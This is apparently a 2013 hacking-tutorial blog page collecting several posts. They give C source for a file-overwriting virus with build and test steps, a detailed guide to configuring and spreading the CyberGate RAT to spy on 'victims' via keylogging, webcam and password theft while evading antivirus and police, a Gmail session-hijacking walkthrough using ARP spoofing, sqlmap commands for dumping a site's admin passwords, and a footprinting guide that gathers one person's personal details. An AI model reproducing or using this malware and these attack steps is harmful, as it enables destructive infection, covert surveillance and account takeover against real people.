Visit our official website APAJR Lab


Wednesday 27 February 2013

create virus using c langauge | .::APAJR::.

| |
2 comments
images (1)



This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect,
Read More

?-: Shutdown Command Via Command Prompt :- | .::APAJR::.

| |
0 comments
images



?-: Shutdown Command Via Command Prompt :-

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.

To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.

The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.

Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.

Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.

In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.

When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.

You can use any combination of shutdown commands in a batch file.
Read More

Footprinting And The Basics Of Hacking | .::APAJR::.

| |
0 comments
index





-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=

-= Footprinting And The Basics Of Hacking =-

-= By Rajeev Ranjan Sharma (RRS) =-
-= feedback@apajr.com =-

-= https://apajrethicalhackingcourse.tk =-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



¥ What Is Footprinting?

Footprinting is the first and most convenient way that hackers use to gather information
about computer systems and the companies they belong to.  The purpose of footprinting to
learn as much as you can about a system, it's remote access capabilities, its ports and
services, and the aspects of its security.

In order to perform a successful hack on a system, it is best to know as much as you can,
if not everything, about that system.  While there is nary a company in the world that
isn't aware of hackers, most companies are now hiring hackers to protect their systems.
And since footprinting can be used to attack a system, it can also be used to protect it.
If you can find anything out about a system, the company that owns that system, with the
right personell, can find out anything they want about you.

In this talk, I will explain what the many functions of footprinting are and what they do.
I'll also footprint everyone's favorite website, just to see how much info we can get on
Grifter.

¥ Open Source Footprinting

Open Source Footprinting is the easiest and safest way to go about finding information
about a company.  Information that is available to the public, such as phone numbers,
addresses, etc.  Performing whois requests, searching through DNS tables, and scanning
certain IP addresses for open ports, are other forms of open source footprinting.  Most
of this information is fairly easy to get, and getting it is legal, legal is always good.

Most companies post a shit load of information about themselves on their website.  A lot
of this information can be very useful to hackers and the companies don't even realize it.
It may also be helpful to skim through the webpage's HTML source  to look for comments.
Comments in HTML code are the equivalent to the small captions under the pictures in high
school science books.  Some comments found in the HTML can hold small tid-bits of info
about the company, otherwise not found anywhere else.

¥ Network Enumeration

Network Enumeration is the process of identifying domain names and associated networks.
The process is performing various queries on the many whois databases found on the
internet.  The result is the hacker now having the information needed to attack the system
they are learning about.  Companie's domain names are listed with registrars, and the
hacker would simply query the registrar to obtain the information they are looking for.
The hacker simply needs to know which registrar the company is listed with.  There are
five types of queries which are as follows:

Registrar Query:  This query gives information on potential domains matching the
target.

Organizational Query:  This is searching a specific registrar to obtain all
instances of the target's name.  The results show many different domains associated
with the company.

Domain Query:  A domain query is based off of results found in an organizational
query.  Using a domain query, you could find the company's address, domain name,
administrator and his/her phone number, and the system's domain servers.  The
administrative contact could be very useful to a hacker as it provides a purpose
for a wardialer.  This is also where social engineering comes into play.  But
that's a talk for another time.  Many administrators now post false phone numbers
to protect themselves from this.

Network Query:  The fourth method one could use the American Registry for Internet
Numbers is to discover certain blocks owned by a company.  It's good to use a
broad search here, as well as in the registrar query.

POC Query:  This query finds the many IP adresses a machine may have.

¥ DNS Interrogation

After gathering the information needed using the above techniques, a hacker would begin to
query the DNS.  A common problem with system adminstrators is allowing untrusted, or worse,
unknown users, to perform a DNS Zone Transfer.  Many freeware tools can be found on the
internet and can be used to perform DNS interrogation.  Tools such as nslookup, for PC, and
AGnet Tools, for Mac, are some common programs used for this.

¥ Other Helpful Techniques Used In Footprinting

Ping Sweep:  Ping a range of IP addresses to find out which machines are awake.

TCP Scans:  Scan ports on machines to see which services are offered.  TCP scans
can be performed by scanning a single port on a range of IPs, or by scanning a
range of ports on a single IP.  Both techniques yeild helpful information.

UDP Scans:  Send garbage UDP packets to a desired port.  I normally don't perform
UDP scans a whole lot because most machines respond with an ICMP 'port unreachable'
message.  Meaning that no service is available.

OS Indentification:  This involves sending illegal ICMP or TCP packets to a machine.

The machine responds with unique invalid inputs and allows the hacker to find out what the
target machine is running.

¥ Let's Try It!

Ok, I've explained as best I can what the functions of footprinting are.  Now we're going
to actually use them.  Let's footprint 2600slc.org to find out as much as we can about
Grifter.  Keep in mind that I am using a mac and I don't know the necessary tools to use
on a PC when footprinting.  For all the procedures listed below, I will be using a utility
known as AGnet Tools version 2.5.1.  This application allows you to use all of the basic
funtions of footprinting in one easy to use program.  I know there are other security
auditing tools for the mac out there which offer more functions, but AGnet is the most
user friendly program I can find.

Now, just by looking at the website, we know where the 2600 meetings are held and at what
time.  This information really isn't useful right now because you obviously managed to find
your way here.  Good for you.  We find that Grifter also runs staticdischarge.org, and by
going further into the website, we find that Grifter has three main email contacts which
are:

grifter@staticdischarge.com
grifter@linuxninjas.org
and grifter@hackinthebox.org

Ok, we have Grifter's three emails which we will use later.  But for now, let's get some
information on 2600slc.org.  We type in 2600slc.org into the prompt of the Name Lookup
window in AGnet tools, and our result is this IP address:

207.173.28.130

But wait, just out of curiosity, what is the IP of staticdischarge.org?  We type the domain
into the Name Lookup prompt and we are given the same IP.  We can safely say that
2600slc.org and staticdischarge.org are hosted on the same box.  But if I were to do a
reverse name lookup on the IP, which domain will come up?  2600slc.org or
taticdischarge.org?  Neither, the result is linuxninjas.org.  Ah ha!  So linuxninjas.org
is the name of the box hosting 2600slc.org and staticdischarge.org.  Neat!

So now that we have the IP, let's check to see if linuxninjas is awake.  We type the IP
into the prompt in the Ping window.  We'll set the interval between packets to 1
millisecond.  We'll set the number of seconds to wait until a ping times out to 5.  We'll
set the ping size to 500 bytes and we'll send ten pings.

Ten packets sent and ten packets received.  Linuxninjas.org returned a message to my
computer within an average of 0.35 seconds for every packet sent.  Linuxninjas is alive
and kicking.

Moving on.  Remember Grifter's three email addresses?  What can we do with those?  This is
where Finger comes in.  A lot of businesses nowadays don't run finger, because it reveals
too much information about any one user on a system.  But of course, it never hurts to try.
Let's enter Grifter's emails into the prompt in the Finger window.

grifter@staticdischarge.com = Finger failed.
grifter@linuxninjas.org = Finger failed.
grifter@hackinthebox.org = Finger failed.

Like I said, a lot of systems no longer use finger.

Ok, since Finger gave us bupkuss, let's move on to Whois.  We open the Whois window and
type linuxninjas.org into the Query prompt, and whois.networksolutions.com into the Server
prompt.  This means we'll be asking Network Solutions to tell us everything they know about
linuxninjas.org.

The result is this laundry list of info:

Registrant:
Static Discharge (LINUXNINJAS-DOM)
p.o.box 511493
SLC, UT 84151
US

Domain Name: LINUXNINJAS.ORG

Administrative Contact, Billing Contact:
Wyler, Neil  (NWB43)  grifter212@uswest.net
Static Discharge
p.o.box 511493
SLC, UT 84151
801-773-6103

Technical Contact:
sutton, kenny  (KS16306)  root@HEKTIK.COM
hektik
p.o.box 511493
SLC, UT 84151
877-828-3849

Record last updated on 17-Aug-2001.
Record expires on 11-Aug-2002.
Record created on 11-Aug-2000.
Database last updated on 12-Dec-2001 04:06:00 EST.

Domain servers in listed order:

NS1.HEKTIK.ORG    207.173.28.130
NS2.HEKTIK.ORG    64.81.168.80

Wow.  Check this out.  But remember that a lot of sysadmins post false info into their
registrars database.  So these phone numbers could be payphones, and these addresses could
be whore houses.  But as far as we know, we now have Grifter's real name, his address and
his phone number.  We also have the same for Kenny.  We can see when Grifter registered
linuxninjas.org, when it expires, and when it was last updated.  And look!  We have
another one of Grifter's email addresses.  Lets run it through Finger just for kicks.

grifter212@uswest.net = Finger failed.  Oh well.

Well, now that we have a bit of personal info on Grifter, let's check back with
linuxninjas.org.

A corner stone of footprinting is Port Scanning.  Let's port scan linuxninjas.org and see
what kind of services are running on that box.  We type in the linuxninjas IP into the Host
prompt of the Port Scan window.  We'll start searching from port number 1, and we'll stop
at the default Sub7 port, 27374.  Our results are:

21    TCP    ftp
22    TCP    ssh    SSH-1.99-OpenSSH_2.30
25    TCP    smtp
53    TCP    domain
80    TCP    www
110    TCP    pop3
111    TCP    sunrpc
113    TCP    ident

Just by this we know that Grifter is running a website and email, (duh), using POP3,
(Post Office Protocal version 3), SUNRPC (SUN Remote Procedure Call), and ident.  This
could lead to some fun trying to access his FTP, or telnetting to his SMTP and sending
your mom midget porn through his email address.

¥ Conclusion

All of these functions are very basic.  They are simpe and easy to use.  And above all,
they are legal.  As I said in the introduction, legal is always good.  Whenever
footprinting a system, keep in mind that you could find something that you aren't supposed
to see.  If this happens, contact the sysadmin and let them know of it.  You could get into
serious trouble if you misuse the information you find.  Also let them know of any bugs or
exploits you may find.  Who knows?  If you help them out enough, you could land a job with
them protecting their system.  Nothing could be greater than getting paid to do what you do
best.  But try not to let money be your motivation.  Hacking is all about learning.

There is definetely more to learn about Grifter and his little websites.  Like why I found
him sneaking around my backyard last night.  But I guess we'll have to delve into that
later.

Especially be careful when trying to access any open ports you may find.  Brute forcing an
ftp or a web server can also land you in a pile.  If anything you try to access requires a
password, you probably shouldn't be there.  But like I said, if you access something
important and it didn't ask you for a password, let the sysadmin know of it.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-
© 2600 apajrethicalhackingcourse.tk 2013
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Read More

Tuesday 26 February 2013

[Tutorial] How To Setup Cybergate RAT by Port Forwarding | .::APAJR::.

| |
1 comments
Hello! You might know me from the stickied Cybergate tutorial in the CG section.. BUT, Im making this 1.07.5 one since it has pretty much more settings & functions to tick & untick xD. So.. Yeah, Lets Start!

**Scroll down to the bottom for the FAQ's!**

Cybergate RAT 1.07.5

In This Tutorial You'll Learn Following:

--//--//--++--//--//

Cybergate 1.07.5 Set Up - Download Cybergate RAT Here -- The AV Detection Is False Positives, Dont Worry.

Setting Up An No-IP
Spreading
Port Forwarding
Setting Up An No-IP Duc - Download Here!
WinRar: 32 Bit 64 Bit

--//--//--++--//--//

Quick Troubleshooting: If You Cant Open The .exe Or It Wont Extract, Try Disabling Your Windows Defender And/Or AV And The Re-Download It.

This Is What You Can Do With This RAT;

Managers:

  • File Manager

  • Process Manager

  • Service Manager

  • Device Manager

  • Window Manager

  • Regitry Manager

  • Installed Programs

  • Active Port list

Spy:

  • Screen Capture

  • Webcam Capture

  • Password Recovery

  • Keylogger

  • Audio Capture

Network Tools:

  • Socks 4/5 Proxy

  • HTTP Proxy

  • Send File

  • Download and Execute

  • Open Webpage

  • URL Redirection

Extras

  • Dos Prompt

  • Quick Search (for logs)

  • Chat

  • Extras (open-close CD-ROM etc.)

  • And Alot More!

Setting Up The No-IP & Client

1. Start Off By Going To; No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"

[Image: NOIP1.png]

3. Now It's Time To Choose Your Host Name!

[Image: NoIP2-1.png]

--//--

Hostname: Your Host Name, EG:
Quote:YourHostName.no-ip.biz

Host Type: DNS Host (A)

Dont Care About The Rest, Once You've Choosen Your Host Name, Press "Create Host" In The Lower Right Bottom.

The Host Is Now Finished! Lets Move On To The No-IP Client.

1. The No-IP Client You Downloaded In The Beginning, Extract It To Your Desktop & Install It.

2. Now When You've Installed It, Open It Up & Log In With Your No-ip Username & Password.

3. When You're Logged In Press "Select Hosts" And Then Check That Little Box With Your Hostname.

[Image: AP2uIE.png]

--// Note: Always Have No-IP Open When You Have Cybergate Open!

There! Your No-IP Host & Your No-IP Duc Is Now Sat Up!

Setting Up Cybergate 1.07.5

1. Extract The Cybergate File You Downloaded In The Beginning To Your Desktop! Once Extracted, Open It & Wait 20 Seconds For The Agreement To Pass! :)

2. When It's Open, Press: Control Center -> Start.

3. Press: Control Center -> Options -> Select Listening Ports

[Image: RAT4-1.png]

4. Once You've Pressed The "Select Listening Ports" This Window Should Appear:

[Image: RAT5-1.png]

5. --/

Firstly, Write "100" In That Little Box And Press The Blue Arrow. Then It Should Appear Under "Active Ports"

Active Ports: The Port You Will Forward Later!

Connections Limit: The Max Amount Of Victims You Can Have.

Connection PW: The Connection Password. Use "123456"

[V] Show Password: (Shows Password)

Once This Is Done, Press "Save"!

6. Now We'll Go To The: Control Center -> Build -> Create Server.

[Image: RAT6-1.png]

User: First, Press "New" And Name It To: "Plutonium". Once Done, Press "OK"

Now Just Double Click On "Plutonium" Or Press "Plutonium" And Then Press "Forward"

7. Now We're In The "Connection" Tab.

[Image: RAT7.png]

First, Press "127.0.0.1 - 999" And Then Press Delete.
Now Press "Add" And Write Your Hostname In It + :100.
Like This:
Quote:YourHostName.No-ip.biz:100

Change The Identification To: Cyber
Change The PW To: 123456

**Note, If You Want To Try The Server On Yourself, Then Delete Both:

- 127.0.0.1:999
- YourHostName.No-ip.biz

And Replace Them With; 127.0.0.1:100 Since 127.0.0.1 Means "Local Computer & LAN Internet"

Make The DNS/HostName Server First Though! :)

DNS: Your Host Name, EG:
Quote:YourHostName.no-ip.biz

Port: The Port You Will Forward Later.
Identification: The slave Name
PW: The Password You Wrote In The Options, "123456"

8. Once You're Done With Theese, You'll Move On To The "Installation" Tab.

[Image: 2010-08-02_1609.png]

9. Have The Same Settings As I Do, And Follow The Instructions In The Image!

--//--//--//--//--//--//

Install Directory: Where The Server Installs,

%System%
%Windows%
%Root%
%Program Files%
%Other%

Use The "System"! :).

Boot: This Is The "Startup" Option. Have Everything Checked & Press "Random" 5 Times And It Will Startup On Your slave Everytime They Start Their Computer!

Directory: Where The Virus Folder Installs
File Name: What The File Will Be Inside The Folder.

Inject Into. What Process It Injects into, Use Default Browser!

[V] Persistance: Keeps Trying To Inject Until Succed.
[V] Hide File: Hides The File, (Not FUD Though!)
[V] CCD: Changes The Creation Date From 16th July To 4 September 2005.

Mutex: Mutex Of The Server, Just Press Random A Couple Of Times!

There We Go, You've Now Completed The "Installation" Tab!

--/ Skip The Message & Keylogger Since They Are Pre-Set Already!

10. You Should Now Have Trumbled Into The "Antis" Tab, Have Everything Checked! (Except SANDBOXIE If You Are Gonna TRY IT ON YOURSELF!)

[Image: RAT9-1.png]

Ok, The Final Tab.. "Creation Of The Server". Have Every Setting As Me!

[Image: RAT10-1.png]

[V] Use Icon: Yes
[V] Delayed Execution: (How Many Seconds It Takes Until Your Server Injects And They Pop Up In Your RAT)
[V] Google Chrome PW: Yes, Steals Their GC Passwords :)
[X] Bind Files: No, Get An Real Binder Instead! (Have Your Server Crypted Though First!)
[X] Compress With UPX: Makes The Server Smaller But More AV's Detects It!

There! Your RAT Is Now Fully Sat Up. You Do Only Need To PORT FORWARD First To Make It Work! Follow This Tutorial: Plutoniums Port Forward Tutorial! Now With UTorrent! And Everything Should Work Out Well!

Quick Troubleshooting If Your RAT Doesent Work:

Non-Connecting RATs

Make Sure That....

1. ..You are properly port-forwarded if using a router.
2. ..You have the No-IP Client installed and running.
3. ..Your DNS entries are correctly spelled when building your server.
4. ..The password in Listening Ports and the password your server uses are identical.
5. ..You are Listening on the correct ports.
6. ..Your Firewall is letting connections through on the port you're listening on.
7. ..Your server is added to excluded files in your Antivirus and Firewall.

''//'' If You Have ANY Troubles With This, Feel Free To PM Me & I'll Reply As Fast As I Can.

Spreading Tips: (Once Your Server Is Crypted & Ready: How To Spread Your Bot

Also, Some Tips On HOW To Not Get Caught And Reported To The FBI. ALWAYS USE AN VPN OR PROXY.

:: A Proxy//VPN Is Something That Replaces Your IP With Another Somewhere Throughout The World.

Get Your VPN // Proxy From Here:
Major Proxy // VPN List


Where To Get Your Server Crypted: Here Or Here Or Just Post In The Hacking Tools Section That You Want Your Server Crypted! :)

Once You've Port Forwarded Your Port: "100" Then Just Get It Crypted And Start Spreading! And In A While You Should Get Some Victims That You Can Have Fun With! (Hopefully Ugly Men Or Sexy chicks ;D...)

Now, some FAQs ;

Q: What is CyberGate?
A: CyberGate is a remote administrative tool or trojan for Windows operating systems. You can use CyberGate to manage computers, monitoring your child etc.

Q: Where can I get CyberGate?
A: There is an website for CyberGate, but you can easily download it from my thread.

Q: What operating systems are supported by CyberGate?
A: Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista
Windows 7

Q: Will CyberGate slow my computer?
A: No. CyberGate won't slow your computer, it is a small program and works in background and has been optimized to minimize resource use.

Q: When I downloaded CyberGate, I can't extract it, a problem occurs. What should I do?
A: That's because of your anti virus, they detect it as unwanted applications so your anti virus could prevent downloading. Disable your anti virus and try again.

Q: When I have downloaded CyberGate, my antivirus detect it as virus. What should I do?
A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, Turkojan is detected as virus also. To download and install CyberGate you will need to turn off your anti-virus.

Q: Why should I use no-ip?
A: If you don't have a static IP, you're IP will change each time your Internet reconnects so the server won't be able to reach you. To prevent loosing victims because of your dynamic IP, you will need no-ip host.

Q: What should I do after I install my server?
A: After you install your server, you should spread it. For more help on spreading Click Here!
Q: I've created a server, but I don't see it in the directory. Why?
A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove or just simply de-activate your antivirus if you are going to use RATs.

Q: I've send my server to a friend on MSN, but he doesn't connect.
A: That's because he has an antivirus or firewall and it won't let him to connect in your RAT. To make it FUD, (Fully Undetectable), you should use a crypter.

Q: Is CyberGate illegal?
A: No. CyberGate is a legal RAT. The author of CyberGate created his program for legitimate purposes. For example, there are many legal activities. Parents can use keyloggers to protect their children from online abuse etc. Some people use it for stealing passwords, credit cards and more but it's not a software which breaks the law, but the person who uses it.

Q: Can CyberGate be used for legitimate purposes?
A: Yes. You can monitor your children online activity.. to make sure they don't visit pornographic websites. You can find out if someone uses your computer while you are away, ensure no one is accessing your personal files while you are away and more.

Q: How do I make my server FUD?
A: You should use a binder or crypter.

Managers:

File Manager

This allows you to easily scramble through all their files on their harddrives. Quite handy in my oppinion ^^

Process Manager

This allows you to pretty much, end/start their processes in the Task Manager. This way you can shut off their AV :).

Service Manager

Pretty much the same as the above ^

Device Manager

Pretty much the same as the above ^. No biggie.

Window Manager

This allows you to shut down their "tasks" from the desktop bar. Love it.

Registry Manager

If you're skilled with the Registry you can change aloot of stuffs, since you have the possibility to do it.

Installed Programs

Allows you to check what programs they have installed on their HDD.

Active Port list

This one is also quite handy, if you need to catch one of their open ports, this is the tool.

Spy:

Screen Capture

If you're interested in what your slave's doing, then you can easily check it out with this.

Webcam Capture

Want to get really "spy" ? Then you should really check out how your slave looks by using this.

Password Recovery

IF you want to catch some of their saved passwords.

Keylogger

Not the best keylogger there is, but it works. Catches all the keystrokes your slave presses.

Audio Capture

Yep.. This one only works if they have a microphone. I once caught my slave having sex. With both webcam and audio capture.. *Shrugs*

Network Tools:

Socks 4/5 Proxy

Use this and you have less of a chance to get FBI busted upon your ass.

HTTP Proxy

Using a web proxy.

Send File

This way you can send them any file. It wont execute tho, so i'd suggest you just leave this , cause the bottom option is even better. (Download & Execute.)

Download and Execute

My favourite. This way you can infect your slave with others viruses, since it sends and downloads. You can send a prank virus too, like.. Anything!

Open Webpage

If you want to play a fool joke on your slave, by going to. etc. (Lolfish.org <---- Don't visit!) Or Nobrain.dk, works too. Have the webcam capture up when you open one of theese pages. See their rections, hilarious!

URL Redirection

I still really haven't figured out what to do with this, but I guess YOU guys will eventually learn? :P

Extras

Dos Prompt

Opens up the Command Prompt window, and allows you to execute several commands.

Quick Search (for logs)

If you want some of their logs.

Chat

This way you can act like either way, FBI, or a hacker. Such as.. "Hello, this is Mr. Andersson from FBI. We've caught you surfing the web to watch child porn. Your computer will be confiscated in 20 minutes." Have the webcam capture up.. Oh my god I always laugh my ass off. XD

Open/Close CD-Rom

Hilarious, they think their computer is haunted.

Change MSN Status

This one isn't really great.. Just changes the MSN status of their MSN. ^^

And Alot More!

Actually, this tool is very nice. I've used it for a few years now, even before I wrote this tutorial.

Thing is, most people (20 % out of 100%) PMs me cause they can't set their ports up. It's not actually that hard.

1. Open up your CMD (Command Prompt) by entering Start -> Run -> CMD

2. Type in IPConfig and get your default gateway. (Usually 192.168.1.1 or 192.168.0.1) -- Something along thoose lines.

3. Remember that IP and open up your webbrowser. Type that IP in.

4. Log in to your router - usually Admin-Admin or Root-Password or just Admin and no password.

5. Once you're IN, go to your portforward tab or VIRTUAL SERVER. Depends on which router you have.

6. Use ports 100 for UCP and TCP.

7. If you have to enter IP, go back to the Command prompt, above default gateway (192.168.0.1) there should be another IP, like;

"192.168.1.12 or 196.168.1.14" yeah, you get it. Thats the IP you use.

8. Port Forward.

9. Open up Cybergate, and make sure you have port 100 selected already in Cybergate.

10. Go to Canyouseeme.org - Type in 100 - If it works, success. And if it doesen't work, then you'll have to follow my even more detailed port forward tutorial HERE

This program is very very funny to use if you want to prank your friends, get revenge on an enemy, or just having fun.

Hope You Liked This Tutorial! Please Post! As You Just Dont Leech Since This Took Me A Quite While To Make XD.



Read More

Gmail Session Hijacking in 7steps | .::APAJR::.

| |
0 comments
Session tokens are crown jewels of user identity on a web application. It's no hidden fact that attacks such as XSS (Cross Site Scripting) are on all time rise that steal these tokens leading to user identity theft.

Although adequate community emphasis has been laid on XSS & its countermeasures, there are other prevalent techniques and wide-spread issues that can steal session tokens perhaps more easily.

The one that I share here is network eavesdropping/sniffing.

A vast majority of the web applications that I have come across use HTTP, post authentication. Example: Gmail, Yahoo, Orkut or for that matter any popular public portal. The list includes several intranet/online financial and payroll apps we see day in and day out.

Below we see a step-by-step attack where we steal session ID of a Gmail user and hijack it in the process. (The credit for this exercise is shared with my colleague, Raj, rajaol@gmail.com):

1. The screenshot below simulates a victim (c00kytest@gmail.com) who is currently accessing his/her Gmail account over a corporate LAN, Cyber Cafe' or Wi-fi hotspot. As we see in the URL bar, the communication is happening over HTTP, i.e. plain text.



2. The second screenshot simulates an attacker sitting somewhere in the same LAN. Though the LAN is a switched environment, the attacker has used a tool called Cain & Abel to become man-in-the-middle (MITM) (there are many tools that can be used to set this up. Ettercap is a good example. We use Cain & Abel for our long time friendship with the tool. We have used it to sniff passwords travelling on SMTP and POP on numerous occasions).



The blue circle in the screenshot (IP: 192.168.0.1) highlights the Internet gateway address that we ARP spoof for victim (IP: 192.168.0.110), highlighted in red circle. The second red circle below confirms the success of first step of attack where all victim traffic is getting routed from attacker's machine. By now we should be able to see all traffic going from victim machine.

Let's fire up wireshark to read the victim data (again, you can use any sniffing tools for this) The above screenshot shows wireshark getting started.

3. As shown in the next screenshot we steal victim's gmail cookie details. This is highlighted in the red circle (IP: 192.168.0.110)



4. We copy the cookie details and paste it on a notepad as shown below



Gmail uses GX token from cookie to track users. It's highlighted in the screenshot above. We just need this value to hijack victim's account.

5. As shown in the screenshot below, we go back to attacker's login (rajaol@gmail.com) and use a firefox add-on called Cookie Editor to insert the stolen cookie.



6. We now paste the stolen GX value in the cookie editor as shown below. (We did some trial and error and removed many other cookies. We also changed token value for gmailchat=c00kytest@gmail.com)



7. Alright. We are done. Now change the URL in the attacker's browser to the one highlighted in the screenshot below (some other gmail links were logging us out directly. This one didn't. There might be others too that could give you the access similarly. It's all trial and error). Gmail shows you logged on as victim !!!
(highlighted in second red circle)



Now that we have seen how simple this attack can be (Wi-fi would be even easier. No ARP spoofing required. It's all broadcast. On top of that many still use WEP. WEP is trivial to crack) and the associated threats, let's look at the countermeasures.

Countermeasures:

1. Use HTTPS
CAVEAT: On a switched LAN, MITM is still possible but your browser will warn you. It will show a certificate error. Users need to take this error seriously and alert the support/security staff. Gmail provides optional email access over https://gmail.com but it is insufficient as it makes other requests over HTTP. Nevertheless you will get a browser warning as soon as the MITM happens (certificate error). You can act upon it accordingly. Yahoo & majority of the other public portals do not provide options HTTPS access.

2. If HTTPS is not possible for performance reasons, use multiple cookies & continuous (page-wise or request-wise) tracking mechanism that detects a sudden new connection & logs out the user automatically.
CAVEAT: This might still be breakable by an attacker if the MITM started before victim's first access to the site.
Read More

hack website using backtrack sqlmap | .::APAJR::.

| |
0 comments
Today i will teach you all, how to hack website admin password using back track.



1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website

sql map 3

Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables



sql map 4

7. Now you will get the tables list which is stored in aj database.
sql map 5



8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

sql map 7

Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !
sql map 9

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.
Read More

Wednesday 20 February 2013

Notepad Tricks: Cool Notepad Virus tricks for Windows | .::APAJR::.

| |
0 comments
Notepad, the text editor that comes bundled in Windows is an excellent tool for text editing. But that is not the only thing for which notepad is famous. It is also famous for its tricks and hacks. Here is a roundup of some of the best and coolest tricks that you can try using Notepad.


Matrix Falling Code Effect - Notepad CMD (.BAT) Tricks


Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.
@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks











Notepad tricks
Matrix Falling Code Effect - Notepad Trick

Upon running the bat file, you will see the "Matrix falling code" effect.

Make Your Keyboard Type (Any) Message Continuously-VBS Trick


This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.
